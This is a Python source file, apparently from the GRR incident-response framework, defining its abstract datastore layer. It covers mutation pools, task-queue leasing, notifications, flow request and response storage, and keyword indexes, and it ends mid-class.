class Error(stats_utils.CountingExceptionMixin, Exception):
"""Base class for all exceptions in this module."""
pass
class TimeoutError(Exception):
"""Raised when an access times out."""
pass
class DBSubjectLockError(Error):
"""Raised when a lock fails to commit."""
counter = "grr_commit_failure"
# This token will be used by default if no token was provided.
default_token = None
def GetDefaultToken(token):
"""Returns the provided token or the default token.
Args:
token: A token or None.
Raises:
access_control.UnauthorizedAccess: no token was provided.
"""
if token is None:
token = default_token
if not isinstance(token, access_control.ACLToken):
raise access_control.UnauthorizedAccess(
"Token is not properly specified. It should be an "
"instance of grr.lib.access_control.ACLToken()")
return token
# This represents a record stored in a queue/collection. The attributes are:
# queue_id: Id of the queue this record is stored in.
# timestamp: Timestamp this record was stored at.
# suffix: A random number that is used to differentiate between records that
# have the same timestamp.
# subpath: Queues store records in different subpaths, this attribute
# specifies which one was used to store the record.
# value: The actual data that the record contains.
Record = collections.namedtuple(
"Record", ["queue_id", "timestamp", "suffix", "subpath", "value"])
class MutationPool(object):
"""A mutation pool.
This is a pool to group a number of mutations together and apply
them at the same time. Note that there are no guarantees about the
atomicity of the mutations. Currently, no mutation will be applied
before Flush() is called on the pool. If datastore errors occur
during application, some mutations might be applied while others are
not.
"""
def __init__(self):
self.delete_subject_requests = []
self.set_requests = []
self.delete_attributes_requests = []
self.new_notifications = []
def DeleteSubjects(self, subjects):
self.delete_subject_requests.extend(subjects)
def DeleteSubject(self, subject):
self.delete_subject_requests.append(subject)
def MultiSet(self,
subject,
values,
timestamp=None,
replace=True,
to_delete=None):
self.set_requests.append((subject, values, timestamp, replace, to_delete))
def Set(self, subject, attribute, value, timestamp=None, replace=True):
self.MultiSet(
subject, {attribute: [value]}, timestamp=timestamp, replace=replace)
def DeleteAttributes(self, subject, attributes, start=None, end=None):
self.delete_attributes_requests.append((subject, attributes, start, end))
def Flush(self):
"""Flushing actually applies all the operations in the pool."""
DB.DeleteSubjects(self.delete_subject_requests, sync=False)
for req in self.delete_attributes_requests:
subject, attributes, start, end = req
DB.DeleteAttributes(subject, attributes, start=start, end=end, sync=False)
for req in self.set_requests:
subject, values, timestamp, replace, to_delete = req
DB.MultiSet(
subject,
values,
timestamp=timestamp,
replace=replace,
to_delete=to_delete,
sync=False)
if (self.delete_subject_requests or self.delete_attributes_requests or
self.set_requests):
DB.Flush()
for queue, notifications in self.new_notifications:
DB.CreateNotifications(queue, notifications)
self.new_notifications = []
self.delete_subject_requests = []
self.set_requests = []
self.delete_attributes_requests = []
def __enter__(self):
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Flush()
def Size(self):
return (len(self.delete_subject_requests) + len(self.set_requests) + len(
self.delete_attributes_requests))
# Notification handling
def CreateNotifications(self, queue, notifications):
self.new_notifications.append((queue, notifications))
def CollectionAddItem(self,
collection_id,
item,
timestamp,
suffix=None,
replace=True):
result_subject, timestamp, suffix = DataStore.CollectionMakeURN(
collection_id, timestamp, suffix=suffix)
self.Set(
result_subject,
DataStore.COLLECTION_ATTRIBUTE,
item.SerializeToString(),
timestamp=timestamp,
replace=replace)
return result_subject, timestamp, suffix
def CollectionAddIndex(self, collection_id, index, timestamp, suffix):
self.Set(
collection_id,
DataStore.COLLECTION_INDEX_ATTRIBUTE_PREFIX + "%08x" % index,
"%06x" % suffix,
timestamp=timestamp,
replace=True)
def CollectionAddStoredTypeIndex(self, collection_id, stored_type):
self.Set(
collection_id,
"%s%s" % (DataStore.COLLECTION_VALUE_TYPE_PREFIX, stored_type),
1,
timestamp=0)
def CollectionDelete(self, collection_id):
for subject, _, _ in DB.ScanAttribute(
str(collection_id.Add("Results")), DataStore.COLLECTION_ATTRIBUTE):
self.DeleteSubject(subject)
if self.Size() > 50000:
self.Flush()
def QueueAddItem(self, queue_id, item, timestamp):
result_subject, timestamp, _ = DataStore.CollectionMakeURN(
queue_id, timestamp, suffix=None, subpath="Records")
self.Set(
result_subject,
DataStore.COLLECTION_ATTRIBUTE,
item.SerializeToString(),
timestamp=timestamp)
def QueueClaimRecords(self,
queue_id,
item_rdf_type,
limit=10000,
timeout="30m",
start_time=None,
record_filter=lambda x: False,
max_filtered=1000):
"""Claims records from a queue. See server/aff4_objects/queue.py."""
now = rdfvalue.RDFDatetime.Now()
expiration = rdfvalue.RDFDatetime.Now() + rdfvalue.Duration(timeout)
after_urn = None
if start_time:
after_urn, _, _ = DataStore.CollectionMakeURN(
queue_id, start_time.AsMicrosecondsSinceEpoch(), 0, subpath="Records")
results = []
filtered_count = 0
for subject, values in DB.ScanAttributes(
str(queue_id.Add("Records")),
[DataStore.COLLECTION_ATTRIBUTE, DataStore.QUEUE_LOCK_ATTRIBUTE],
max_records=4 * limit,
after_urn=after_urn):
if DataStore.COLLECTION_ATTRIBUTE not in values:
# Unlikely case, but could happen if, say, a thread called RefreshClaims
# so late that another thread already deleted the record. Go ahead and
# clean this up.
self.DeleteAttributes(subject, [DataStore.QUEUE_LOCK_ATTRIBUTE])
continue
if DataStore.QUEUE_LOCK_ATTRIBUTE in values:
timestamp = rdfvalue.RDFDatetime.FromMicrosecondsSinceEpoch(
values[DataStore.QUEUE_LOCK_ATTRIBUTE][1])
if timestamp > now:
continue
rdf_value = item_rdf_type.FromSerializedString(
values[DataStore.COLLECTION_ATTRIBUTE][1])
if record_filter(rdf_value):
filtered_count += 1
if max_filtered and filtered_count >= max_filtered:
break
continue
results.append(
Record(
queue_id=queue_id,
timestamp=values[DataStore.COLLECTION_ATTRIBUTE][0],
suffix=int(subject[-6:], 16),
subpath="Records",
value=rdf_value))
self.Set(subject, DataStore.QUEUE_LOCK_ATTRIBUTE, expiration)
filtered_count = 0
if len(results) >= limit:
break
return results
def QueueRefreshClaims(self, records, timeout="30m"):
expiration = rdfvalue.RDFDatetime.Now() + rdfvalue.Duration(timeout)
for record in records:
subject, _, _ = DataStore.CollectionMakeURN(
record.queue_id, record.timestamp, record.suffix, record.subpath)
self.Set(subject, DataStore.QUEUE_LOCK_ATTRIBUTE, expiration)
def QueueDeleteRecords(self, records):
for record in records:
subject, _, _ = DataStore.CollectionMakeURN(
record.queue_id, record.timestamp, record.suffix, record.subpath)
self.DeleteAttributes(
subject,
[DataStore.QUEUE_LOCK_ATTRIBUTE, DataStore.COLLECTION_ATTRIBUTE])
def QueueReleaseRecords(self, records):
for record in records:
subject, _, _ = DataStore.CollectionMakeURN(
record.queue_id, record.timestamp, record.suffix, record.subpath)
self.DeleteAttributes(subject, [DataStore.QUEUE_LOCK_ATTRIBUTE])
def QueueDeleteTasks(self, queue, tasks):
"""Removes the given tasks from the queue."""
predicates = []
for task in tasks:
task_id = getattr(task, "task_id", None) or int(task)
predicates.append(DataStore.QueueTaskIdToColumn(task_id))
self.DeleteAttributes(queue, predicates)
def QueueScheduleTasks(self, tasks, timestamp):
for queue, queued_tasks in iteritems(
collection.Group(tasks, lambda x: x.queue)):
to_schedule = {}
for task in queued_tasks:
to_schedule[DataStore.QueueTaskIdToColumn(
task.task_id)] = [task.SerializeToString()]
self.MultiSet(queue, to_schedule, timestamp=timestamp)
def QueueQueryAndOwn(self, queue, lease_seconds, limit, timestamp):
"""Returns a list of Tasks leased for a certain time.
Args:
queue: The queue to query from.
lease_seconds: The tasks will be leased for this long.
limit: Number of values to fetch.
timestamp: Range of times for consideration.
Returns:
A list of GrrMessage() objects leased.
"""
# Do the real work in a transaction
try:
lock = DB.LockRetryWrapper(queue, lease_time=lease_seconds)
return self._QueueQueryAndOwn(
lock.subject,
lease_seconds=lease_seconds,
limit=limit,
timestamp=timestamp)
except DBSubjectLockError:
# This exception just means that we could not obtain the lock on the queue
# so we just return an empty list, let the worker sleep and come back to
# fetch more tasks.
return []
except Error as e:
logging.warning("Datastore exception: %s", e)
return []
def _QueueQueryAndOwn(self,
subject,
lease_seconds=100,
limit=1,
timestamp=None):
"""Business logic helper for QueueQueryAndOwn()."""
tasks = []
lease = int(lease_seconds * 1e6)
# Only grab attributes with timestamps in the past.
delete_attrs = set()
serialized_tasks_dict = {}
for predicate, task, timestamp in DB.ResolvePrefix(
subject,
DataStore.QUEUE_TASK_PREDICATE_PREFIX,
timestamp=(0, timestamp or rdfvalue.RDFDatetime.Now())):
task = rdf_flows.GrrMessage.FromSerializedString(task)
task.leased_until = timestamp
task.leased_by = utils.ProcessIdString()
# Decrement the ttl
task.task_ttl -= 1
if task.task_ttl <= 0:
# Remove the task if ttl is exhausted.
delete_attrs.add(predicate)
stats_collector_instance.Get().IncrementCounter(
"grr_task_ttl_expired_count")
else:
if task.task_ttl != rdf_flows.GrrMessage.max_ttl - 1:
stats_collector_instance.Get().IncrementCounter(
"grr_task_retransmission_count")
serialized_tasks_dict.setdefault(predicate,
[]).append(task.SerializeToString())
tasks.append(task)
if len(tasks) >= limit:
break
if delete_attrs or serialized_tasks_dict:
# Update the timestamp on claimed tasks to be in the future and decrement
# their TTLs, delete tasks with expired ttls.
self.MultiSet(
subject,
serialized_tasks_dict,
replace=True,
timestamp=int(time.time() * 1e6) + lease,
to_delete=delete_attrs)
if delete_attrs:
logging.info("TTL exceeded for %d messages on queue %s",
len(delete_attrs), subject)
return tasks
def LabelUpdateLabels(self, subject, new_labels, to_delete):
new_attributes = {}
for label in new_labels:
new_attributes[DataStore.LABEL_ATTRIBUTE_TEMPLATE % label] = (
DataStore.EMPTY_DATA_PLACEHOLDER)
delete_attributes = [
DataStore.LABEL_ATTRIBUTE_TEMPLATE % label for label in to_delete
]
if new_attributes or delete_attributes:
self.MultiSet(
subject, new_attributes, to_delete=delete_attributes, timestamp=0)
def FileHashIndexAddItem(self, subject, file_path):
predicate = (DataStore.FILE_HASH_TEMPLATE % file_path).lower()
self.MultiSet(subject, {predicate: [file_path]})
def AFF4AddChild(self, subject, child, extra_attributes=None):
"""Adds a child to the specified parent."""
precondition.AssertType(child, Text)
attributes = {
DataStore.AFF4_INDEX_DIR_TEMPLATE % child: [
DataStore.EMPTY_DATA_PLACEHOLDER
]
}
if extra_attributes:
attributes.update(extra_attributes)
self.MultiSet(subject, attributes)
def AFF4DeleteChild(self, subject, child):
self.DeleteAttributes(
subject, [DataStore.AFF4_INDEX_DIR_TEMPLATE % utils.SmartStr(child)])
class DataStore(with_metaclass(registry.MetaclassRegistry, object)):
"""Abstract database access."""
# Constants relating to timestamps.
ALL_TIMESTAMPS = "ALL_TIMESTAMPS"
NEWEST_TIMESTAMP = "NEWEST_TIMESTAMP"
TIMESTAMPS = [ALL_TIMESTAMPS, NEWEST_TIMESTAMP]
LEASE_ATTRIBUTE = "aff4:lease"
NOTIFY_PREDICATE_PREFIX = "notify:"
NOTIFY_PREDICATE_TEMPLATE = NOTIFY_PREDICATE_PREFIX + "%s"
FLOW_REQUEST_PREFIX = "flow:request:"
FLOW_REQUEST_TEMPLATE = FLOW_REQUEST_PREFIX + "%08X"
FLOW_STATUS_TEMPLATE = "flow:status:%08X"
FLOW_STATUS_PREFIX = "flow:status:"
FLOW_RESPONSE_PREFIX = "flow:response:"
FLOW_RESPONSE_TEMPLATE = FLOW_RESPONSE_PREFIX + "%08X:%08X"
LABEL_ATTRIBUTE_PREFIX = "index:label_"
LABEL_ATTRIBUTE_TEMPLATE = "index:label_%s"
EMPTY_DATA_PLACEHOLDER = "X"
FILE_HASH_PREFIX = "index:target:"
FILE_HASH_TEMPLATE = "index:target:%s"
AFF4_INDEX_DIR_PREFIX = "index:dir/"
AFF4_INDEX_DIR_TEMPLATE = "index:dir/%s"
mutation_pool_cls = MutationPool
flusher_thread = None
enable_flusher_thread = True
monitor_thread = None
def __init__(self):
in_test = "Test Context" in config.CONFIG.context
if not in_test and self.enable_flusher_thread:
# Start the flusher thread.
self.flusher_thread = utils.InterruptableThread(
name="DataStore flusher thread", target=self.Flush, sleep_time=0.5)
self.flusher_thread.start()
self.monitor_thread = None
def InitializeMonitorThread(self):
"""Start the thread that registers the size of the DataStore."""
if self.monitor_thread:
return
self.monitor_thread = utils.InterruptableThread(
name="DataStore monitoring thread",
target=self._RegisterSize,
sleep_time=60)
self.monitor_thread.start()
@classmethod
def SetupTestDB(cls):
cls.enable_flusher_thread = False
def ClearTestDB(self):
pass
def DestroyTestDB(self):
pass
def _RegisterSize(self):
"""Measures size of DataStore."""
stats_collector_instance.Get().SetGaugeValue("datastore_size", self.Size())
def Initialize(self):
"""Initialization of the datastore."""
@abc.abstractmethod
def DeleteSubject(self, subject, sync=False):
"""Completely deletes all information about this subject."""
def DeleteSubjects(self, subjects, sync=False):
"""Delete multiple subjects at once."""
for subject in subjects:
self.DeleteSubject(subject, sync=sync)
def Set(self,
subject,
attribute,
value,
timestamp=None,
replace=True,
sync=True):
"""Set a single value for this subject's attribute.
Args:
subject: The subject this applies to.
attribute: Attribute name.
value: serialized value into one of the supported types.
timestamp: The timestamp for this entry in microseconds since the epoch.
If None means now.
replace: Bool whether or not to overwrite current records.
sync: If true we ensure the new values are committed before returning.
"""
# TODO(user): don't allow subject = None
self.MultiSet(
subject, {attribute: [value]},
timestamp=timestamp,
replace=replace,
sync=sync)
def LockRetryWrapper(self,
subject,
retrywrap_timeout=1,
retrywrap_max_timeout=10,
blocking=True,
lease_time=None):
"""Retry a DBSubjectLock until it succeeds.
Args:
subject: The subject which the lock applies to.
retrywrap_timeout: How long to wait before retrying the lock.
retrywrap_max_timeout: The maximum time to wait for a retry until we
raise.
blocking: If False, raise on first lock failure.
lease_time: lock lease time in seconds.
Returns:
The DBSubjectLock object
Raises:
DBSubjectLockError: If the maximum retry count has been reached.
"""
timeout = 0
while timeout < retrywrap_max_timeout:
try:
return self.DBSubjectLock(subject, lease_time=lease_time)
except DBSubjectLockError:
if not blocking:
raise
stats_collector_instance.Get().IncrementCounter("datastore_retries")
time.sleep(retrywrap_timeout)
timeout += retrywrap_timeout
raise DBSubjectLockError("Retry number exceeded.")
@abc.abstractmethod
def DBSubjectLock(self, subject, lease_time=None):
"""Returns a DBSubjectLock object for a subject.
This opens a read/write lock to the subject. Any read access to the subject
will have a consistent view between threads. Any attempts to write to the
subject must be performed under lock. DBSubjectLocks may fail and raise the
DBSubjectLockError() exception.
Users should almost always call LockRetryWrapper() to retry if the lock
isn't obtained on the first try.
Args:
subject: The subject which the lock applies to. Only a single subject
may be locked in a lock.
lease_time: The minimum amount of time the lock should remain alive.
Returns:
A lock object.
"""
@abc.abstractmethod
def MultiSet(self,
subject,
values,
timestamp=None,
replace=True,
sync=True,
to_delete=None):
"""Set multiple attributes' values for this subject in one operation.
Args:
subject: The subject this applies to.
values: A dict with keys containing attributes and values, serializations
to be set. values can be a tuple of (value, timestamp). Value must be
one of the supported types.
timestamp: The timestamp for this entry in microseconds since the epoch.
None means now.
replace: Bool whether or not to overwrite current records.
sync: If true we block until the operation completes.
to_delete: An array of attributes to clear prior to setting.
"""
def MultiDeleteAttributes(self,
subjects,
attributes,
start=None,
end=None,
sync=True):
"""Remove all specified attributes from a list of subjects.
Args:
subjects: The list of subjects that will have these attributes removed.
attributes: A list of attributes.
start: A timestamp, attributes older than start will not be deleted.
end: A timestamp, attributes newer than end will not be deleted.
sync: If true we block until the operation completes.
"""
for subject in subjects:
self.DeleteAttributes(
subject, attributes, start=start, end=end, sync=sync)
@abc.abstractmethod
def DeleteAttributes(self,
subject,
attributes,
start=None,
end=None,
sync=True):
"""Remove all specified attributes.
Args:
subject: The subject that will have these attributes removed.
attributes: A list of attributes.
start: A timestamp, attributes older than start will not be deleted.
end: A timestamp, attributes newer than end will not be deleted.
sync: If true we block until the operation completes.
"""
def Resolve(self, subject, attribute):
"""Retrieve a value set for a subject's attribute.
This method is easy to use but always gets the latest version of the
attribute. It is more flexible and efficient to use the other Resolve
methods.
Args:
subject: The subject URN.
attribute: The attribute.
Returns:
A (value, timestamp in microseconds) stored in the datastore cell, or
(None, 0). Value will be the same type as originally stored with Set().
Raises:
AccessError: if anything goes wrong.
"""
for _, value, timestamp in self.ResolveMulti(
subject, [attribute], timestamp=self.NEWEST_TIMESTAMP):
# Just return the first one.
return value, timestamp
return (None, 0)
@abc.abstractmethod
def MultiResolvePrefix(self,
subjects,
attribute_prefix,
timestamp=None,
limit=None):
"""Generate a set of values matching for subjects' attribute.
This method provides backwards compatibility for the old method of
specifying regexes. Each datastore can move to prefix matching by
overriding this method and ResolvePrefix below.
Args:
subjects: A list of subjects.
attribute_prefix: The attribute prefix.
timestamp: A range of times for consideration (In microseconds). Can be a
constant such as ALL_TIMESTAMPS or NEWEST_TIMESTAMP or a tuple of ints
(start, end). Inclusive of both lower and upper bounds.
limit: The total number of result values to return.
Returns:
A dict keyed by subjects, with values being a list of (attribute, value
string, timestamp).
Values with the same attribute (happens when timestamp is not
NEWEST_TIMESTAMP, but ALL_TIMESTAMPS or time range) are guaranteed
to be ordered in the decreasing timestamp order.
Raises:
AccessError: if anything goes wrong.
"""
def ResolvePrefix(self, subject, attribute_prefix, timestamp=None,
limit=None):
"""Retrieve a set of value matching for this subject's attribute.
Args:
subject: The subject that we will search.
attribute_prefix: The attribute prefix.
timestamp: A range of times for consideration (In microseconds). Can be a
constant such as ALL_TIMESTAMPS or NEWEST_TIMESTAMP or a tuple of ints
(start, end).
limit: The number of results to fetch.
Returns:
A list of (attribute, value string, timestamp).
Values with the same attribute (happens when timestamp is not
NEWEST_TIMESTAMP, but ALL_TIMESTAMPS or time range) are guaranteed
to be ordered in the decreasing timestamp order.
Raises:
AccessError: if anything goes wrong.
"""
for _, values in self.MultiResolvePrefix([subject],
attribute_prefix,
timestamp=timestamp,
limit=limit):
values.sort(key=lambda a: a[0])
return values
return []
@abc.abstractmethod
def ResolveMulti(self, subject, attributes, timestamp=None, limit=None):
"""Resolve multiple attributes for a subject.
Results may be in unsorted order.
Args:
subject: The subject to resolve.
attributes: The attribute string or list of strings to match. Note this is
an exact match, not a regex.
timestamp: A range of times for consideration (In microseconds). Can be a
constant such as ALL_TIMESTAMPS or NEWEST_TIMESTAMP or a tuple of ints
(start, end).
limit: The maximum total number of results we return.
"""
def ResolveRow(self, subject, **kw):
return self.ResolvePrefix(subject, "", **kw)
@abc.abstractmethod
def Flush(self):
"""Flushes the DataStore."""
def Size(self):
"""DataStore size in bytes."""
return -1
def __del__(self):
if self.flusher_thread:
self.flusher_thread.Stop()
if self.monitor_thread:
self.monitor_thread.Stop()
try:
self.Flush()
except Exception: # pylint: disable=broad-except
pass
def _CleanSubjectPrefix(self, subject_prefix):
subject_prefix = utils.SmartStr(rdfvalue.RDFURN(subject_prefix))
if subject_prefix[-1] != "/":
subject_prefix += "/"
return subject_prefix
def _CleanAfterURN(self, after_urn, subject_prefix):
if after_urn:
after_urn = utils.SmartStr(after_urn)
if not after_urn.startswith(subject_prefix):
raise ValueError("after_urn \"%s\" does not begin with prefix \"%s\"" %
(after_urn, subject_prefix))
return after_urn
@abc.abstractmethod
def ScanAttributes(self,
subject_prefix,
attributes,
after_urn=None,
max_records=None,
relaxed_order=False):
"""Scan for values of multiple attributes across a range of rows.
Scans rows for values of attribute. Reads the most recent value stored in
each row.
Args:
subject_prefix: Subject beginning with this prefix can be scanned. Must be
an aff4 object and a directory - "/" will be appended if necessary. User
must have read and query permissions on this directory.
attributes: A list of attribute names to scan.
after_urn: If set, only scan records which come after this urn.
max_records: The maximum number of records to scan.
relaxed_order: By default, ScanAttribute yields results in lexographic
order. If this is set, a datastore may yield results in a more
convenient order. For certain datastores this might greatly increase the
performance of large scans.
Yields: Pairs (subject, result_dict) where result_dict maps attribute to
(timestamp, value) pairs.
"""
def ScanAttribute(self,
subject_prefix,
attribute,
after_urn=None,
max_records=None,
relaxed_order=False):
for s, r in self.ScanAttributes(
subject_prefix, [attribute],
after_urn=after_urn,
max_records=max_records,
relaxed_order=relaxed_order):
ts, v = r[attribute]
yield (s, ts, v)
def GetMutationPool(self):
return self.mutation_pool_cls()
def CreateNotifications(self, queue_shard, notifications):
values = {}
for notification in notifications:
values[self.NOTIFY_PREDICATE_TEMPLATE % notification.session_id] = [
(notification.SerializeToString(), notification.timestamp)
]
self.MultiSet(queue_shard, values, replace=False, sync=True)
def DeleteNotifications(self, queue_shards, session_ids, start, end):
attributes = [
self.NOTIFY_PREDICATE_TEMPLATE % session_id
for session_id in session_ids
]
self.MultiDeleteAttributes(
queue_shards, attributes, start=start, end=end, sync=True)
def GetNotifications(self, queue_shard, end, limit=10000):
for predicate, serialized_notification, ts in self.ResolvePrefix(
queue_shard,
self.NOTIFY_PREDICATE_PREFIX,
timestamp=(0, end),
limit=limit):
try:
# Parse the notification.
notification = rdf_flows.GrrNotification.FromSerializedString(
serialized_notification)
except Exception: # pylint: disable=broad-except
logging.exception(
"Can't unserialize notification, deleting it: "
"predicate=%s, ts=%d", predicate, ts)
self.DeleteAttributes(
queue_shard,
[predicate],
# Make the time range narrow, but be sure to include the needed
# notification.
start=ts,
end=ts,
sync=True)
continue
# Strip the prefix from the predicate to get the session_id.
session_id = predicate[len(self.NOTIFY_PREDICATE_PREFIX):]
notification.session_id = session_id
notification.timestamp = ts
yield notification
def GetFlowResponseSubject(self, session_id, request_id):
"""The subject used to carry all the responses for a specific request_id."""
return session_id.Add("state/request:%08X" % request_id)
def ReadRequestsAndResponses(self,
session_id,
timestamp=None,
request_limit=None,
response_limit=None):
"""Fetches all Requests and Responses for a given session_id."""
subject = session_id.Add("state")
requests = {}
# Get some requests.
for predicate, serialized, _ in self.ResolvePrefix(
subject,
self.FLOW_REQUEST_PREFIX,
limit=request_limit,
timestamp=timestamp):
request_id = predicate.split(":", 1)[1]
requests[str(subject.Add(request_id))] = serialized
# And the responses for them.
response_data = dict(
self.MultiResolvePrefix(
list(iterkeys(requests)),
self.FLOW_RESPONSE_PREFIX,
limit=response_limit,
timestamp=timestamp))
for urn, request_data in sorted(iteritems(requests)):
request = rdf_flow_runner.RequestState.FromSerializedString(request_data)
responses = []
for _, serialized, timestamp in response_data.get(urn, []):
msg = rdf_flows.GrrMessage.FromSerializedString(serialized)
msg.timestamp = timestamp
responses.append(msg)
yield (request, sorted(responses, key=lambda msg: msg.response_id))
def ReadCompletedRequests(self, session_id, timestamp=None, limit=None):
"""Fetches all the requests with a status message queued for them."""
subject = session_id.Add("state")
requests = {}
status = {}
for predicate, serialized, _ in self.ResolvePrefix(
subject, [self.FLOW_REQUEST_PREFIX, self.FLOW_STATUS_PREFIX],
limit=limit,
timestamp=timestamp):
parts = predicate.split(":", 3)
request_id = parts[2]
if parts[1] == "status":
status[request_id] = serialized
else:
requests[request_id] = serialized
for request_id, serialized in sorted(iteritems(requests)):
if request_id in status:
yield (rdf_flow_runner.RequestState.FromSerializedString(serialized),
rdf_flows.GrrMessage.FromSerializedString(status[request_id]))
def ReadResponsesForRequestId(self, session_id, request_id, timestamp=None):
"""Reads responses for one request.
Args:
session_id: The session id to use.
request_id: The id of the request.
timestamp: A timestamp as used in the data store.
Yields:
fetched responses for the request
"""
request = rdf_flow_runner.RequestState(id=request_id, session_id=session_id)
for _, responses in self.ReadResponses([request], timestamp=timestamp):
return responses
def ReadResponses(self, request_list, timestamp=None):
"""Reads responses for multiple requests at the same time.
Args:
request_list: The list of requests the responses should be fetched for.
timestamp: A timestamp as used in the data store.
Yields:
tuples (request, lists of fetched responses for the request)
"""
response_subjects = {}
for request in request_list:
response_subject = self.GetFlowResponseSubject(request.session_id,
request.id)
response_subjects[response_subject] = request
response_data = dict(
self.MultiResolvePrefix(
response_subjects, self.FLOW_RESPONSE_PREFIX, timestamp=timestamp))
for response_urn, request in sorted(iteritems(response_subjects)):
responses = []
for _, serialized, timestamp in response_data.get(response_urn, []):
msg = rdf_flows.GrrMessage.FromSerializedString(serialized)
msg.timestamp = timestamp
responses.append(msg)
yield (request, sorted(responses, key=lambda msg: msg.response_id))
def StoreRequestsAndResponses(self,
new_requests=None,
new_responses=None,
requests_to_delete=None):
"""Stores new flow requests and responses to the data store.
Args:
new_requests: A list of tuples (request, timestamp) to store in the data
store.
new_responses: A list of tuples (response, timestamp) to store in the data
store.
requests_to_delete: A list of requests that should be deleted from the
data store.
"""
to_write = {}
if new_requests is not None:
for request, timestamp in new_requests:
subject = request.session_id.Add("state")
queue = to_write.setdefault(subject, {})
queue.setdefault(self.FLOW_REQUEST_TEMPLATE % request.id, []).append(
(request.SerializeToString(), timestamp))
if new_responses is not None:
for response, timestamp in new_responses:
# Status messages cause their requests to be marked as complete. This
# allows us to quickly enumerate all the completed requests - it is
# essentially an index for completed requests.
if response.type == rdf_flows.GrrMessage.Type.STATUS:
subject = response.session_id.Add("state")
attribute = self.FLOW_STATUS_TEMPLATE % response.request_id
to_write.setdefault(subject, {}).setdefault(attribute, []).append(
(response.SerializeToString(), timestamp))
subject = self.GetFlowResponseSubject(response.session_id,
response.request_id)
attribute = self.FLOW_RESPONSE_TEMPLATE % (response.request_id,
response.response_id)
to_write.setdefault(subject, {}).setdefault(attribute, []).append(
(response.SerializeToString(), timestamp))
to_delete = {}
if requests_to_delete is not None:
for request in requests_to_delete:
queue = to_delete.setdefault(request.session_id.Add("state"), [])
queue.append(self.FLOW_REQUEST_TEMPLATE % request.id)
queue.append(self.FLOW_STATUS_TEMPLATE % request.id)
for subject in set(to_write) | set(to_delete):
self.MultiSet(
subject,
to_write.get(subject, {}),
to_delete=to_delete.get(subject, []),
sync=True)
def CheckRequestsForCompletion(self, requests):
"""Checks if there is a status message queued for a number of requests."""
subjects = [r.session_id.Add("state") for r in requests]
statuses_found = {}
for subject, result in self.MultiResolvePrefix(subjects,
self.FLOW_STATUS_PREFIX):
for predicate, _, _ in result:
request_nr = int(predicate.split(":")[-1], 16)
statuses_found.setdefault(subject, set()).add(request_nr)
status_available = set()
for r in requests:
if r.request_id in statuses_found.get(r.session_id.Add("state"), set()):
status_available.add(r)
return status_available
def DeleteRequest(self, request):
return self.DeleteRequests([request])
def DeleteRequests(self, requests):
# Efficiently drop all responses to this request.
subjects = [
self.GetFlowResponseSubject(request.session_id, request.id)
for request in requests
]
self.DeleteSubjects(subjects, sync=True)
def DestroyFlowStates(self, session_id):
return self.MultiDestroyFlowStates([session_id])
def MultiDestroyFlowStates(self, session_ids, request_limit=None):
"""Deletes all requests and responses for the given flows.
Args:
session_ids: A lists of flows to destroy.
request_limit: A limit on the number of requests to delete.
Returns:
A list of requests that were deleted.
"""
subjects = [session_id.Add("state") for session_id in session_ids]
to_delete = []
deleted_requests = []
for subject, values in self.MultiResolvePrefix(
subjects, self.FLOW_REQUEST_PREFIX, limit=request_limit):
for _, serialized, _ in values:
request = rdf_flow_runner.RequestState.FromSerializedString(serialized)
deleted_requests.append(request)
# Drop all responses to this request.
response_subject = self.GetFlowResponseSubject(request.session_id,
request.id)
to_delete.append(response_subject)
# Mark the request itself for deletion.
to_delete.append(subject)
# Drop them all at once.
self.DeleteSubjects(to_delete, sync=True)
return deleted_requests
def DeleteWellKnownFlowResponses(self, session_id, responses):
subject = session_id.Add("state/request:00000000")
predicates = []
for response in responses:
predicates.append(self.FLOW_RESPONSE_TEMPLATE % (response.request_id,
response.response_id))
self.DeleteAttributes(subject, predicates, sync=True, start=0)
def FetchResponsesForWellKnownFlow(self, session_id, response_limit,
timestamp):
subject = session_id.Add("state/request:00000000")
for _, serialized, timestamp in sorted(
self.ResolvePrefix(
subject,
self.FLOW_RESPONSE_PREFIX,
limit=response_limit,
timestamp=timestamp)):
msg = rdf_flows.GrrMessage.FromSerializedString(serialized)
msg.timestamp = timestamp
yield msg
# Index handling.
_INDEX_PREFIX = "kw_index:"
_INDEX_PREFIX_LEN = len(_INDEX_PREFIX)
_INDEX_COLUMN_FORMAT = _INDEX_PREFIX + "%s"
def _KeywordToURN(self, urn, keyword):
return urn.Add(keyword)
def IndexAddKeywordsForName(self, index_urn, name, keywords):
timestamp = rdfvalue.RDFDatetime.Now().AsMicrosecondsSinceEpoch()
with self.GetMutationPool() as mutation_pool:
for keyword in set(keywords):
mutation_pool.Set(
self._KeywordToURN(index_urn, keyword),
self._INDEX_COLUMN_FORMAT % name,
"",
timestamp=timestamp)
def IndexRemoveKeywordsForName(self, index_urn, name, keywords):
with self.GetMutationPool() as mutation_pool:
for keyword in set(keywords):
mutation_pool.DeleteAttributes(
self._KeywordToURN(index_urn, keyword),
[self._INDEX_COLUMN_FORMAT % name])
def IndexReadPostingLists(self,
index_urn,
keywords,
start_time,
end_time,
last_seen_map=None):
"""Finds all objects associated with any of the keywords.
Args:
index_urn: The base urn of the index.
keywords: A collection of keywords that we are interested in.
start_time: Only considers keywords added at or after this point in time.
end_time: Only considers keywords at or before this point in time.
last_seen_map: If present, is treated as a dict and populated to map pairs
(keyword, name) to the timestamp of the latest connection found.
Returns:
A dict mapping each keyword to a set of relevant names.
"""
keyword_urns = {self._KeywordToURN(index_urn, k): k for k in keywords}
result = {}
for kw in keywords:
result[kw] = set()
for keyword_urn, value in self.MultiResolvePrefix(
list(iterkeys(keyword_urns)),
self._INDEX_PREFIX,
timestamp=(start_time, end_time + 1)):
for column, _, ts in value:
kw = keyword_urns[keyword_urn]
name = column[self._INDEX_PREFIX_LEN:]
result[kw].add(name)
if last_seen_map is not None:
last_seen_map[(kw, name)] = max(last_seen_map.get((kw, name), -1), ts)
return result
# The largest possible suffix - maximum value expressible by 6 hex digits.
COLLECTION_MAX_SUFFIX = 0xffffff
# The attribute (column) where we store value.
COLLECTION_ATTRIBUTE = "aff4:sequential_value"
# An attribute name of the form "index:sc_<i>" at timestamp <t> indicates that
# the item with record number i was stored at timestamp t. The timestamp
# suffix is stored as the value.
COLLECTION_INDEX_ATTRIBUTE_PREFIX = "index:sc_"
# The attribute prefix to use when storing the index of stored types
# for multi type collections.
COLLECTION_VALUE_TYPE_PREFIX = "aff4:value_type_"
# The attribute where we store locks. A lock is a timestamp indicating when
# the lock becomes stale at the record may be claimed again.
